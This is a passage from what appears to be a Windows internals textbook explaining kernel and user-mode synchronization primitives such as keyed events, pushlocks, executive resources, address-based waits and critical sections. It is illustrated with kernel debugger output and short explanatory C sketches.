    [+0x018] Thread            : 0xffff898f2b345080 [Type: _KTHREAD *]
    [+0x018] NotificationQueue : 0xffff898f2b345080 [Type: _KQUEUE *]
    [+0x020] Object            : 0xffff898f2b64ba60 [Type: void *]
    [+0x028] SparePtr          : 0x0 [Type: void *]
In this case, the wait type indicates a WaitAny, so we know that there is a thread blocking on
the event, whose pointer we are given. We also see that the wait block is active. Next, we can
look at a few wait-related fields in the thread itself:
lkd> dt nt!_KTHREAD 0xffff898f2b345080 WaitRegister.State WaitIrql WaitMode WaitBlockCount WaitReason WaitTime
    +0x070 WaitRegister   :
        +0x000 State      : 0y001
    +0x186 WaitIrql       : 0 ''
    +0x187 WaitMode       : 1 ''
    +0x1b4 WaitTime       : 0x39b38f8
    +0x24b WaitBlockCount : 0x1 ''
    +0x283 WaitReason     : 0x6 ''
The data shows that this is a committed wait that was performed at IRQL 0 (Passive Level)
with a wait mode of UserMode, at the time shown in 15 ms clock ticks since boot, with the reason
indicating a user-mode application request. We can also see that this is the only wait block this
thread has, meaning that it is not waiting for any other object.
If the wait list head in the object had contained more than one entry, you could have executed the
same commands on the second pointer value in the WaitListEntry field of each wait block (and run
!thread on the thread pointer in the wait block) to traverse the list and see what other threads
are currently waiting for the object. If those threads were waiting for more than one object, you would
look at their WaitBlockCount to see how many other wait blocks were present, and simply keep
incrementing the pointer by sizeof(KWAIT_BLOCK).
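That traversal is plain pointer arithmetic over a contiguous array, which can be sketched like this (a hypothetical miniature of KWAIT_BLOCK containing only the object pointer, for illustration):

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical miniature of a wait block: just the waited-on object. */
struct kwait_block {
    void *object;
};

/* Visit each of a thread's wait blocks the way the experiment describes:
 * start at the first block and keep incrementing the pointer by
 * sizeof(struct kwait_block) until WaitBlockCount blocks have been seen. */
static size_t count_waited_objects(struct kwait_block *first,
                                   unsigned char wait_block_count) {
    size_t seen = 0;
    for (struct kwait_block *wb = first; wb < first + wait_block_count; wb++)
        if (wb->object != NULL)
            seen++;
    return seen;
}
```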
Another possibility is that the wait type would have been WaitNotification, in which case we would
have used the notification queue pointer instead to dump the I/O completion port (KQUEUE) structure, which is
itself a dispatcher object. Potentially, it would also have had its own nonempty wait block list, which
would have revealed the wait block associated with the worker thread that will be asynchronously
picking up the completion. To determine which callback would
eventually execute, you would have to dump user-mode thread pool data structures.
Keyed events
A synchronization object called a keyed event bears special mention because of the role it played in
user-mode-exclusive synchronization primitives and the development of the alert-by-ID primitive,
which you can think of as its replacement. Keyed events are also comparable to the futex in the Linux
operating system (a well-studied computer science concept). They were originally implemented to help
processes deal with low-memory situations when using critical sections, which are user-mode
synchronization objects that we'll see more about shortly. A keyed event allows a thread to specify
a "key" for which it waits, where the thread wakes when another thread of the same process signals
the event with the same key. As we pointed out, if this sounds familiar to the alerting mechanism, it is
because keyed events were its precursor.
If there was contention, EnterCriticalSection would dynamically allocate an event object, and the
thread wanting to acquire the critical section would wait for the thread that owns the critical section to
signal it in LeaveCriticalSection. Clearly, this introduces a problem during low-memory conditions: criti-
cal section acquisition could fail because the system was unable to allocate the event object required.
In a pathological case, the low-memory condition itself might have been caused by the application try-
ing to acquire the critical section, so the system would deadlock in this situation. Low memory wasn't
the only scenario that could cause this to fail—a less likely scenario was handle exhaustion. If the pro-
cess reached its handle limit, the new handle for the event object could fail.
It might seem that preallocating a global standard event object, similar to the reserve objects we
described earlier, would fix the problem. However, because a process can have multiple critical sec-
tions, each of which can have its own locking state, this would require an unknown number of preal-
located event objects, so this solution does not work. The main feature of keyed events, however, was
that a single event could be reused among different threads, as long as each one provided a different
key to distinguish itself. By providing the virtual address of the critical section itself as the key, this ef-
fectively allows multiple critical sections (and thus, waiters) to use the same keyed event handle, which
can be preallocated at process startup time.
A thread waits on the keyed event by specifying a key (in this case, the address of the
critical section). When the owner thread releases the keyed event by signaling it, only a single thread
waiting on that key is woken up (the same behavior as synchronization events, in contrast to notifica-
tion events). Going back to our use case of critical sections using their address as a key, this would im-
ply that each process still needs its own keyed event because virtual addresses are obviously unique
to a single process address space. However, it turns out that the kernel wakes only the waiters in
the current process, so the key is effectively isolated across processes, meaning that there can be only
a single keyed event object for the entire system.
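The wake-one, per-process-key semantics can be modeled with a small sketch (hypothetical names and a fixed-size waiter list; the real object keeps a kernel list of waiters and makes a signaler with no waiters block, as described next):

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical in-memory model of the single, global keyed event: each
 * waiter records the waiting process and its key (e.g., the address of
 * a critical section), because keys are only meaningful within a process. */
struct keyed_waiter {
    int   process_id;
    void *key;
    bool  waiting;
};

#define MAX_WAITERS 8
static struct keyed_waiter waiters[MAX_WAITERS];

/* Register a waiter; returns its slot, or -1 if the table is full. */
static int keyed_wait(int pid, void *key) {
    for (int i = 0; i < MAX_WAITERS; i++)
        if (!waiters[i].waiting) {
            waiters[i] = (struct keyed_waiter){ pid, key, true };
            return i;
        }
    return -1;
}

/* Signaling wakes exactly one waiter with a matching (process, key) pair,
 * mirroring synchronization-event (wake-one) semantics. */
static bool keyed_signal(int pid, void *key) {
    for (int i = 0; i < MAX_WAITERS; i++)
        if (waiters[i].waiting && waiters[i].process_id == pid &&
            waiters[i].key == key) {
            waiters[i].waiting = false; /* release this one waiter */
            return true;
        }
    return false; /* no waiter: the real kernel makes the signaler wait */
}
```

Because the process ID participates in the match, two processes using the same virtual address as a key never wake each other's waiters, which is what allows one object to serve the whole system.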
As such, when EnterCriticalSection called NtWaitForKeyedEvent to perform a wait on the keyed
event, it gave a NULL handle as parameter for the keyed event, telling the kernel that it was unable
to create a keyed event. The kernel recognizes this behavior and uses a global keyed event named
ExpCritSecOutOfMemoryEvent. The benefit is that processes don't need to waste a handle for
a named keyed event anymore because the kernel keeps track of the object and its references.
However, keyed events were more than just a fallback object for low-memory conditions. When
multiple waiters are waiting on the same key and need to be woken up, the key is signaled multiple
times, which requires the object to keep a list of all the waiters so that it can perform a “wake” opera-
tion on each of them. (Recall that the result of signaling a keyed event is the same as that of signaling a
synchronization event.) However, a thread can signal a keyed event without any threads on the waiter
list. In this scenario, the signaling thread instead waits on the event itself.
Without this fallback, a signaling thread could signal the keyed event during the time that the user-
mode code saw the keyed event as unsignaled and attempt a wait. The wait might have come after
the signaling thread signaled the keyed event, resulting in a missed pulse, so the waiting thread would
deadlock. By forcing the signaling thread to wait in this scenario, it actually signals the keyed event only
when someone is looking (waiting). This behavior made them similar, but not identical, to the Linux
futex, and allowed their use as the basis for new user-mode synchronization primitives such as
Slim Reader/Writer (SRW) locks.
Note When the keyed-event wait code needs to perform a wait, it uses a built-in sema-
phore located in the kernel-mode thread object (ETHREAD) called KeyedWaitSemaphore.
(This semaphore shares its location with the ALPC wait semaphore.) See Chapter 4 of Part 1
for more information on thread objects.
Keyed events did not, however, replace standard event objects in the critical section implementa-
tion. The initial reason, during the Windows XP timeframe, was that keyed events did not offer scalable
performance in heavy-usage scenarios. Recall that all the algorithms described were meant to be used
in rare low-memory scenarios, not the degree of contention that a single global object was now expect-
ed to handle. The primary performance bottleneck was that keyed events maintained the list of waiters
described in a doubly linked list. This kind of list has poor traversal speed, meaning the time required
to loop through the list. In this case, this time depended on the number of waiter threads. Because the
object is global, dozens of threads could be on the list, requiring long traversal times every single time
a key was set or waited on.
Note The head of the list is kept in the keyed event object, whereas the threads are linked
through the KeyedWaitChain field (which is shared with the thread's exit time, stored as a
LARGE_INTEGER, the same size as a doubly linked list) in the kernel-mode thread object
(ETHREAD). See Chapter 4 of Part 1 for more information on this object.
Windows Vista improved keyed-event performance by using a hash table instead of a linked list
to hold the waiter threads. This optimization is what ultimately allowed Windows to include the three
new lightweight user-mode synchronization primitives (to be discussed shortly) that all depended on
the keyed event. Critical sections, however, continued to use event objects, primarily for application
compatibility and debugging, because the event object and internals are well known and documented,
whereas keyed events are opaque and not exposed to the Win32 API.
With the introduction of the new alerting by Thread ID capabilities in Windows 8, however, this all
changed again, removing the usage of keyed events across the system (save for one situation in the init
once mechanism, which you'll see shortly). The critical section
structure eventually dropped its usage of a regular event object and moved toward using this new
capability as well (with an application compatibility shim that can revert to using the original event object
if needed).
Fast mutexes and guarded mutexes
Fast mutexes, which are also known as executive mutexes, usually offer better performance than mutex
objects because, although they are still built on a dispatcher object—an event—they perform a wait
only if the fast mutex is contended. Unlike a standard mutex, which always attempts the acquisition
through the dispatcher, this gives the fast mutex especially good performance in contended environ-
ments. However, fast mutexes are suitable only when all kernel-mode
APC (described earlier in this chapter) delivery can be disabled, unlike regular mutex objects that block
only normal APC delivery. Fast mutexes are acquired with
ExAcquireFastMutex and ExAcquireFastMutexUnsafe. The former function blocks all APC delivery by
raising the IRQL of the processor to APC level. The latter, “unsafe” function, expects to be called with
all kernel-mode APC delivery already disabled, which can be done by raising the IRQL to APC level.
A third function, ExTryToAcquireFastMutex, performs the acquisition if possible but returns immediately
without blocking if the fast mutex is already owned. Finally, fast mutexes cannot be acquired
recursively, unlike mutex objects.
In Windows 8 and later, guarded mutexes are identical to fast mutexes but are acquired
with KeAcquireGuardedMutex and KeAcquireGuardedMutexUnsafe. Like fast mutexes, a
KeTryToAcquireGuardedMutex method also exists.
Prior to Windows 8, these functions did not disable APCs by raising the IRQL to APC level, but by
entering a guarded region instead, which set special counters in the thread's object structure to dis-
able APC delivery until the region was exited, as we saw earlier. On older systems with a PIC (which we
also talked about earlier in this chapter), this was faster than touching the IRQL. Additionally, guarded
mutexes used a gate dispatcher object, which was slightly faster than an event—another difference that
is no longer true.
Another problem related to the guarded mutex was the kernel function KeAreApcsDisabled. Prior to
Windows Server 2003, this function indicated whether normal APCs were disabled by checking whether
the code was running inside a critical section. In Windows Server 2003, this function was changed to
indicate whether the code was in a critical or guarded region, changing the functionality to also return
TRUE if special kernel APCs are also disabled.
Because there are certain operations that drivers should not perform when special kernel APCs
are disabled, it made sense to call KeGetCurrentIrql to check whether the IRQL is APC level or not,
which was the only way special kernel APCs could have been disabled. However, with the intro-
duction of guarded regions and guarded mutexes, which were heavily used even by the memory
manager, this check failed because guarded mutexes did not raise IRQL. Drivers then had to call
KeAreAllApcsDisabled for this purpose, which also checked whether special kernel APCs were disabled
through a guarded region. These subtleties, and the resulting potential for
false positives, ultimately all led to the decision to simply make guarded mutexes revert to just being
fast mutexes.
Executive resources
Executive resources are a synchronization mechanism that supports shared and exclusive access; like
fast mutexes, they require that all kernel-mode APC delivery be disabled before they are acquired.
They are also built on dispatcher objects that are used only when there is contention. Executive re-
sources are heavily used by file systems, because these drivers tend to
have long-lasting wait periods in which I/O should still be allowed to some extent (such as reads).
Threads waiting to acquire an executive resource for shared access wait for a semaphore associated
with the resource, and threads waiting to acquire an executive resource for exclusive access wait for an
event. A semaphore with unlimited count is used for shared waiters because they can all be woken and
granted access to the resource when an exclusive holder releases the resource simply by signaling the
semaphore. When a thread waits for exclusive access of a resource that is currently owned, it waits on
a synchronization event object because only one of the waiters will wake when the event is signaled. In
the earlier section on synchronization events, it was mentioned that some event unwait operations can
actually cause a priority boost. This scenario occurs when executive resources are used, which is one
reason why they also track ownership like mutexes do. (See Chapter 4 of Part 1 for more information on
the executive resource priority boost.)
Because of the flexibility that shared and exclusive access offer, there are a number of functions for
acquiring resources: ExAcquireResourceSharedLite, ExAcquireResourceExclusiveLite, ExAcquireShared
StarveExclusive, and ExAcquireShareWaitForExclusive. These functions are documented in the WDK.
Recent versions of Windows also added fast executive resources that use identical API names but
add the word “fast,” such as ExAcquireFastResourceExclusive, ExReleaseFastResource, and so on. These
are meant to be faster replacements due to different handling of lock ownership, but no component
currently uses them.
EXPERIMENT: Listing acquired executive resources
The kernel debugger !locks command searches the kernel's linked list of executive resources and
dumps their state. By default, the command lists only executive resources that are currently
owned, but the –d option is documented as listing all executive resources—unfortunately, this
is no longer the case. However, you can still use the -v flag to dump verbose information on all
resources instead. Here is partial output of the command:
lkd> !locks -v
**** DUMP OF ALL RESOURCE OBJECTS ****
Resource @ nt!ExpFirmwareTableResource (0xfffff8047ee34440) Available
Resource @ nt!PsLoadedModuleResource (0xfffff8047ee48120) Available
Contention Count = 2
Resource @ nt!SepRmDbLock (0xfffff8047ef06350) Available
Contention Count = 93
Resource @ nt!SepRmDbLock (0xfffff8047ef063b8) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06420) Available
Resource @ nt!SepRmDbLock (0xfffff8047ef06488) Available
Resource @ nt!SepRmGlobalSaclLock (0xfffff8047ef062b0) Available
Resource @ nt!SepLsaAuditQueueInfo (0xfffff8047ee6e010) Available
Resource @ nt!SepLsaDeletedLogonQueueInfo (0xfffff8047ee6ded0) Available
Resource @ 0xffff898f032a8550 Available
Resource @ nt!PnpRegistryDeviceResource (0xfffff8047ee62b00) Available
Contention Count = 27385
Resource @ nt!PopPolicyLock (0xfffff8047ee458c0) Available
Contention Count = 14
Resource @ 0xffff898f032a8950 Available
Resource @ 0xffff898f032a82d0 Available
Note that the contention count, which is extracted from the resource structure, records
the number of times threads have tried to acquire the resource and had to wait because it was
already owned. On a live system where you break in with the debugger, you might be lucky
enough to catch a few held resources, as shown in the following output:
2: kd> !locks
**** DUMP OF ALL RESOURCE OBJECTS ****
KD: Scanning for held locks.....
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks....
Resource @ 0xffffde07a2bfb350 Shared 1 owning threads
Contention Count = 2
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8070c00 Shared 1 owning threads
Threads: ffffde07aa3f1083-01<*> *** Actual Thread ffffde07aa3f1080
KD: Scanning for held locks...........................................................
Resource @ 0xffffde07a8995900 Exclusively owned
Threads: ffffde07a9374080-01<*>
KD: Scanning for held locks...........................................................
9706 total locks, 4 locks currently held
You can examine the details of a specific resource object, including the thread that owns the
resource and any threads that are waiting for the resource, by specifying the –v switch and the
address of the resource:
2: kd> !locks -v 0xffffde07a33d6a28
Resource @ 0xffffde07a33d6a28 Shared 1 owning threads
Contention Count = 28
Threads: ffffde07a9374080-01<*>
THREAD ffffde07a9374080 Cid 0544.1494 Teb: 000000ed8de12000
Win32Thread: 0000000000000000 WAIT: (Executive) KernelMode Non-Alertable
ffff8287943a87b8 NotificationEvent
IRP List:
ffffde07a936da20: (0006,0478) Flags: 00020043 Mdl: ffffde07a8a75950
ffffde07a894fa20: (0006,0478) Flags: 00000884 Mdl: 00000000
Not impersonating
DeviceMap
ffff8786fce35840
Owning Process
ffffde07a7f990c0
Image:
svchost.exe
Attached Process
N/A
Image:
N/A
Wait Start TickCount
3649
Ticks: 0
Context Switch Count
31
IdealProcessor: 1
UserTime 00:00:00.015
KernelTime 00:00:00.000
Win32 Start Address 0x00007ff926812390
Stack Init ffff8287943aa650 Current ffff8287943a8030
Base ffff8287943ab000 Limit ffff8287943a4000 Call 0000000000000000
Priority 7 BasePriority 6 PriorityDecrement 0 IoPriority 0 PagePriority 1
Child-SP
RetAddr
Call Site
ffff8287`943a8070 fffff801`104a423a nt!KiSwapContext+0x76
ffff8287`943a81b0 fffff801`104a5d53 nt!KiSwapThread+0x5ba
ffff8287`943a8270 fffff801`104a6579 nt!KiCommitThreadWait+0x153
ffff8287`943a8310 fffff801`1263e962 nt!KeWaitForSingleObject+0x239
ffff8287`943a8400 fffff801`1263d682 Ntfs!NtfsNonCachedIo+0xa52
ffff8287`943a86b0 fffff801`1263b756 Ntfs!NtfsCommonRead+0x1d52
ffff8287`943a8850 fffff801`1049a725 Ntfs!NtfsFsdRead+0x396
ffff8287`943a8920 fffff801`11826591 nt!IofCallDriver+0x55
Pushlocks
Pushlocks are another optimized synchronization mechanism built on event objects; like fast and
guarded mutexes, they wait for acquisition of the lock only when there is contention. They offer advan-
tages over them, however, in that they can also be acquired in shared or exclusive mode, just like an
executive resource. Unlike the latter, however, they provide an additional advantage due to their size:
a resource object is 104 bytes, but a pushlock is pointer sized. Because of this, pushlocks do not require
allocation nor initialization and are guaranteed to work in low-memory conditions. Many components
inside of the kernel moved away from executive resources to pushlocks, and modern third-party driv-
ers all use pushlocks as well.
There are four types of pushlocks: normal, cache-aware, auto-expand, and address-based. Normal
pushlocks require only the size of a pointer in storage (4 bytes on 32-bit systems, and 8 bytes on 64-bit
systems). When a thread acquires a normal pushlock, the pushlock code marks the pushlock as owned
if it is not currently owned. If the pushlock is owned exclusively, or the thread wants to acquire the
lock exclusively and the pushlock is owned on a shared basis, the thread allocates a wait block on
its stack, initializes an event object in the wait block, and adds the wait block to the wait list
associated with the pushlock. When a thread releases a pushlock, the thread wakes a waiter, if any are
present, by signaling the event in the waiter's wait block.
Because a pushlock is only pointer-sized, it actually contains a variety of bits to describe its state.
The meaning of those bits changes as the pushlock changes from being contended to noncontended.
In its initial state, the pushlock contains the following structure:
■ One lock bit, set to 1 if the lock is acquired
■ One waiting bit, set to 1 if the lock is contended and someone is waiting on it
■ One waking bit, set to 1 if the pushlock is being granted to a thread and the waiters' list needs
to be optimized
■ One multiple shared bit, set to 1 if the pushlock is shared and currently acquired by more than
one thread
■ 28 (on 32-bit Windows) or 60 (on 64-bit Windows) share count bits, containing the number of
threads that have acquired the pushlock
As discussed previously, when a thread acquires a pushlock exclusively while the pushlock is already
acquired by either multiple readers or a writer, the kernel allocates a pushlock wait block. The structure
of the pushlock value itself changes. The share count bits now become the pointer to the wait block.
Because this wait block is allocated on the thread's stack, and the header file contains a special alignment direc-
tive to force it to be 16-byte aligned, the bottom 4 bits of any pushlock wait-block structure will be all
zeros. Therefore, those bits are ignored for the purposes of pointer dereferencing; instead, the 4 bits
shown earlier are combined with the pointer value. Because this alignment removes the share count
bits, the share count is now stored in the wait block instead.
A cache-aware pushlock adds layers to the normal (basic) pushlock by allocating a pushlock for each
processor in the system and associating it with the cache-aware pushlock. When a thread wants to
acquire a cache-aware pushlock for shared access, it simply acquires the pushlock allocated for its cur-
rent processor in shared mode; to acquire a cache-aware pushlock exclusively, the thread acquires the
pushlock for each processor in exclusive mode.
As you can imagine, however, with Windows now supporting systems of up to 2560 processors, the
number of potential cache-padded slots in the cache-aware pushlock would require immense fixed al-
locations, even on systems with few processors. Support for dynamic hot-add of processors makes the
problem even harder because it would technically require the preallocation of all 2560 slots ahead of
time, creating multi-KB lock structures. To solve this, modern versions of Windows also implement the
auto-expand push lock. As the name suggests, this type of cache-aware pushlock can dynamically grow
the number of cache slots as needed, both based on contention and processor count, while guarantee-
ing forward progress, leveraging the executive’s slot allocator, which pre-reserves paged or nonpaged
pool (depending on flags that were passed in when allocating the auto-expand pushlock).
Unfortunately for third-party developers, cache-aware (and their newer cousins, auto-expand)
pushlocks are not officially documented for use, although certain data structures, such as FCB Headers in
Windows 10 21H1 and later, do opaquely use them (more information about the FCB structure is available
in Chapter 11.) Internal parts of the kernel in which auto-expand pushlocks are used include the memory
manager, where they are used to protect Address Windowing Extension (AWE) data structures.
Finally, another kind of nondocumented, but exported, push-lock is the address-based pushlock,
which rounds out the implementation with a mechanism similar to the address-based wait we’ll shortly
see in user mode. Other than being a different “kind” of pushlock, the address-based pushlock refers
more to the interface behind its usage. On one end, a caller uses ExBlockOnAddressPushLock, passing
in a pushlock, the virtual address of some variable of interest, the size of the variable (up to 8 bytes),
and a comparison address containing the expected, or desired, value of the variable. If the variable
does not currently have the expected value, a wait is initialized with ExTimedWaitForUnblockPushLock.
This behaves similarly to contended pushlock acquisition, with the difference that a timeout value can
be specified. On the other end, a caller uses ExUnblockOnAddressPushLockEx after making a change
to an address that is being monitored to signal a waiter that the value has changed. This technique
is especially useful when dealing with changes to data protected by a lock or interlocked operation,
so that racing readers can wait for the writer’s notification that their change is complete, outside of a
lock. Other than a much smaller memory footprint, one of the large advantages that pushlocks have
over executive resources is that in the noncontended case they do not require lengthy accounting and
integer operations to perform acquisition or release. By being as small as a pointer, the kernel can use
atomic CPU instructions to perform these tasks. (For example, on x86 and x64 processors, lock cmpxchg
is used, which atomically compares and exchanges the old lock with a new lock.) If the atomic compare
and exchange fails, the lock contains values the caller did not expect (callers usually expect the lock to
be unused or acquired as shared), and a call is then made to the more complex contended version.
To improve performance even further, the kernel exposes the pushlock functionality as inline
functions, meaning that no function calls are ever generated during noncontended acquisition—the
assembly code is directly inserted in each function. This increases code size slightly, but it avoids the
slowness of a function call. Finally, pushlocks use several algorithmic tricks to avoid lock convoys (a
situation that can occur when multiple threads of the same priority are all waiting on a lock and little
actual work gets done), and they are also self-optimizing: the list of threads waiting on a pushlock will
be periodically rearranged to provide fairer behavior when the pushlock is released.
One more performance optimization that is applicable to pushlock acquisition (including for address-
based pushlocks) is the opportunistic spinlock-like behavior during contention, before performing the
dispatcher object wait on the pushlock wait block’s event. If the system has at least one other unparked
processor (see Chapter 4 of Part 1 for more information on core parking), the kernel enters a tight spin-
based loop for ExpSpinCycleCount cycles just like a spinlock would, but without raising the IRQL, issuing
a yield instruction (such as a pause on x86/x64) for each iteration. If during any of the iterations, the push-
lock now appears to be released, an interlocked operation to acquire the pushlock is performed.
If the spin cycle times out, or the interlocked operation failed (due to a race), or if the system does
not have at least one additional unparked processor, then KeWaitForSingleObject is used on the event
object in the pushlock wait block. ExpSpinCycleCount is set to 10240 cycles on any machine with more
than one logical processor and is not configurable. For systems with an AMD processor that imple-
ments the MWAITT (MWAIT Timer) specification, the monitorx and mwaitx instructions are used
instead of a spin loop. This hardware-based feature enables waiting, at the CPU level, for the value at an
address to change without having to enter a loop, but they allow providing a timeout value so that the
wait is not indefinite (which the kernel supplies based on ExpSpinCycleCount).
On a final note, with the introduction of the AutoBoost feature (explained in Chapter 4 of Part 1),
pushlocks also leverage its capabilities by default, unless callers use the newer ExXxxPushLockXxxEx
functions, which allow passing in the EX_PUSH_LOCK_FLAG_DISABLE_AUTOBOOST flag that disables
the functionality (which is not officially documented). By default, the non-Ex functions now call the
newer Ex functions, but without supplying the flag.
Address-based waits
Based on the lessons learned with keyed events, the key synchronization primitive that the Windows
kernel now exposes to user mode is the alert-by-ID system call (and its counterpart to wait-on-alert-by-
ID). With these two simple system calls, which require no memory allocations or handles, any number
of process-local synchronizations can be built, which will include the addressed-based waiting mecha-
nism we’re about to see, on top of which other primitives, such as critical sections and SRW locks, are
based upon.
Address-based waiting is based on three documented Win32 API calls: WaitOnAddress,
WakeByAddressSingle, and WakeByAddressAll. These functions in KernelBase.dll are nothing more than
forwarders into Ntdll.dll, where the real implementations are present under similar names beginning with
Rtl, standing for Run Time Library. The Wait API takes in an address pointing to a value of interest, the
size of the value (up to 8 bytes), and the address of the undesired value, plus a timeout. The Wake APIs
take in the address only.
First, RtlWaitOnAddress builds a local address wait block tracking the thread ID and address and
inserts it into a per-process hash table located in the Process Environment Block (PEB). This mir-
rors the work done by ExBlockOnAddressPushLock as we saw earlier, except that a hash table wasn’t
needed because the caller had to store a push lock pointer somewhere. Next, just like the kernel API,
RtlWaitOnAddress checks whether the target address already has a value different than the undesirable
one and, if so, removes the address wait block, returning FALSE. Otherwise, it will call an internal
function to block.
If there is more than one unparked processor available, the blocking function will first attempt to
avoid entering the kernel by spinning in user mode on the value of the address wait block bit indicating
availability, based on the value of RtlpWaitOnAddressSpinCount, which is hardcoded to 1024 as long as
the system has more than one processor. If the wait block still indicates contention, a system call is now
made to the kernel using NtWaitForAlertByThreadId, passing in the address as the hint parameter, as
well as the timeout.
If the function returns due to a timeout, a flag is set in the address wait block to indicate this, and
the block is removed, with the function returning STATUS_TIMEOUT. However, there is a subtle race
condition where the caller may have called the Wake function just a few cycles after the wait has timed
out. Because the wait block flag is modified with a compare-exchange instruction, the code can detect
this and actually calls NtWaitForAlertByThreadId a second time, this time without a timeout. This is
guaranteed to return because the code knows that a wake is in progress. Note that in nontimeout
cases, there’s no need to remove the wait block, because the waker has already done so.
On the writer’s side, both RtlWakeOnAddressSingle and RtlWakeOnAddressAll leverage the same
helper function, which hashes the input address and looks it up in the PEB’s hash table introduced
earlier in this section. Carefully synchronizing with compare-exchange instructions, it removes the
address wait block from the hash table, and, if committed to wake up any waiters, it iterates over all
matching wait blocks for the same address, calling NtAlertThreadByThreadId for each of them in the
All version of the API, or only for the first one in the Single version of the API.
With this implementation, we essentially now have a user-mode implementation of keyed events
that does not rely on any kernel object or handle, not even a single global one, completely removing
any failures in low-resource conditions. The only thing the kernel is responsible for is putting the thread
in a wait state or waking up the thread from that wait state.
The next few sections cover various primitives that leverage this functionality to provide synchroni-
zation during contention.
Critical sections
Critical sections are one of the main synchronization primitives that Windows provides to user-mode
application developers on top of the kernel-based synchronization primitives. Critical sections and the
other user-mode primitives you’ll see later have one major advantage over their kernel counterparts,
which is saving a round trip to kernel mode in cases in which the lock is noncontended (which is typi-
cally 99 percent of the time or more). Contended cases still require calling the kernel, however, because
it is the only piece of the system that can perform the complex waking and dispatching logic required
to make these objects work.
Critical sections can remain in user mode by using a local bit to provide the main exclusive locking
logic, much like a pushlock. If the bit is 0, the critical section can be acquired, and the owner sets the bit
to 1. This operation doesn’t require calling the kernel but uses the interlocked CPU operations dis-
cussed earlier. Releasing the critical section behaves similarly, with bit state changing from 1 to 0 with
an interlocked operation. On the other hand, as you can probably guess, when the bit is already 1 and
another caller attempts to acquire the critical section, the kernel must be called to put the thread in a
wait state.
Akin to pushlocks and address-based waits, critical sections implement a further optimiza-
tion to avoid entering the kernel: spinning, much like a spinlock (albeit at IRQL 0—Passive Level)
on the lock bit, hoping it clears up quickly enough to avoid the blocking wait. By default, this
is set to 2000 cycles, but it can be configured differently by using the InitializeCriticalSectionEx
or InitializeCriticalSectionAndSpinCount API at creation time, or later, by calling
SetCriticalSectionSpinCount.
Note As we discussed, because WaitOnAddress already implements a busy spin wait
as an optimization, with a default 1024 cycles, technically there are 3024 cycles spent spin-
ning by default—first on the critical sections’ lock bit and then on the wait address block’s
lock bit, before actually entering the kernel.
When they do need to enter the true contention path, critical sections will, the first time they’re
called, attempt to initialize their LockSemaphore field. On modern versions of Windows, this is only done
if RtlpForceCSToUseEvents is set, which is the case if the KACF_ALLOCDEBUGINFOFORCRITSECTIONS
(0x400000) flag is set through the Application Compatibility Database on the current process. If the flag
is set, however, the underlying dispatcher event object will be created (even if the field name refers to a
semaphore, the object is an event). Then, assuming that the event was created, a call to WaitForSingleObject is
performed to block on the critical section (typically with a per-process configurable timeout value, to aid
in the debugging of deadlocks, after which the wait is reattempted).
In cases where the application compatibility shim was not requested, or in extreme low-memory
conditions where the shim was requested but the event could not be created, critical sections no
longer use the event (nor any of the keyed event functionality described earlier). Instead, they directly
leverage the address-based wait mechanism described earlier (also with the same deadlock detection
timeout mechanism from the previous paragraph). The address of the local bit is supplied to the call
to WaitOnAddress, and as soon as the critical section is released by LeaveCriticalSection, it either calls
SetEvent on the event object or WakeAddressSingle on the local bit.
Note Even though we’ve been referring to APIs by their Win32 name, in reality, critical
sections are implemented by Ntdll.dll, and KernelBase.dll merely forwards the functions
to identical functions starting with Rtl instead, as they are part of the Run Time Library.
Therefore, RtlLeaveCriticalSection calls NtSetEvent or RtlWakeAddressSingle, and so on.
Finally, because critical sections are not kernel objects, they have certain limitations. The primary
one is that you cannot obtain a kernel handle to a critical section; as such, no security, naming, or other
Object Manager functionality can be applied to a critical section. Two processes cannot use the same
critical section to coordinate their operations, nor can duplication or inheritance be used.
User-mode resources
User-mode resources also provide more fine-grained locking mechanisms than kernel primitives. A
resource can be acquired for shared mode or for exclusive mode, allowing it to function as a multiple-
reader (shared), single-writer (exclusive) lock for data structures such as databases. When a resource is
acquired in shared mode and other threads attempt to acquire the same resource, no trip to the kernel
is required because none of the threads will be waiting. Only when a thread attempts to acquire the
resource for exclusive access, or the resource is already locked by an exclusive owner, is this required.
To make use of the same dispatching and synchronization mechanism you saw in the kernel, resources
make use of existing kernel primitives. A resource data structure (RTL_RESOURCE) contains handles
to two kernel semaphore objects. When threads contend for exclusive ownership of the resource, the
resource releases the exclusive semaphore with a single release count because it permits only one
owner. When threads contend for shared ownership, the resource releases
the shared semaphore with as many release counts as the number of shared owners. This level of detail
is typically hidden from the programmer, and these internal objects should never be used directly.
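The multi-count release described above can be sketched with a POSIX counting semaphore. Because sem_t has no multi-count release, the sketch posts once per shared owner; the names are ours, and this models only the wake-up accounting, not RTL_RESOURCE itself.

```c
#include <semaphore.h>

/* Model of the resource's shared semaphore: when shared waiters exist,
 * the releasing thread posts it once per shared owner so that every
 * reader wakes up. */
static sem_t shared_sem;

static void wake_shared_waiters(int n_shared_owners) {
    /* ~ "releases the shared semaphore with as many release counts
     *    as the number of shared owners" */
    for (int i = 0; i < n_shared_owners; i++)
        sem_post(&shared_sem);
}

static int drain_wakeups(void) {
    int woken = 0;
    while (sem_trywait(&shared_sem) == 0)  /* each waiter consumes one count */
        woken++;
    return woken;
}
```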
Resources were originally implemented to support the SAM (or Security Account Manager, which is
discussed in Chapter 7 of Part 1) and not exposed through the Windows API for standard applications.
Slim Reader-Writer Locks (SRW Locks), described shortly, were later implemented to expose a similar
but highly optimized locking primitive through a documented API, although some system components
still use the resource mechanism.
Condition variables
Condition variables provide a Windows native implementation for synchronizing a set of threads that
are waiting on a specific result to a conditional test. Although this operation was possible with other
user-mode synchronization methods, there was no atomic mechanism to check the result of the condi-
tional test and to begin waiting on a change in the result. This required that additional synchronization
be used around such pieces of code.
A user-mode thread initializes a condition variable by calling InitializeConditionVariable to set up the
initial state. When it wants to initiate a wait on the variable, it can call SleepConditionVariableCS, which
uses a critical section (that the thread must have initialized) to wait for changes to the variable, or, even
better, SleepConditionVariableSRW, which instead uses a Slim Reader/Writer (SRW) lock, which we describe
next, giving the caller the advantage of doing a shared (reader) or exclusive (writer) acquisition.
Meanwhile, the setting thread must use WakeConditionVariable (or WakeAllConditionVariable) after
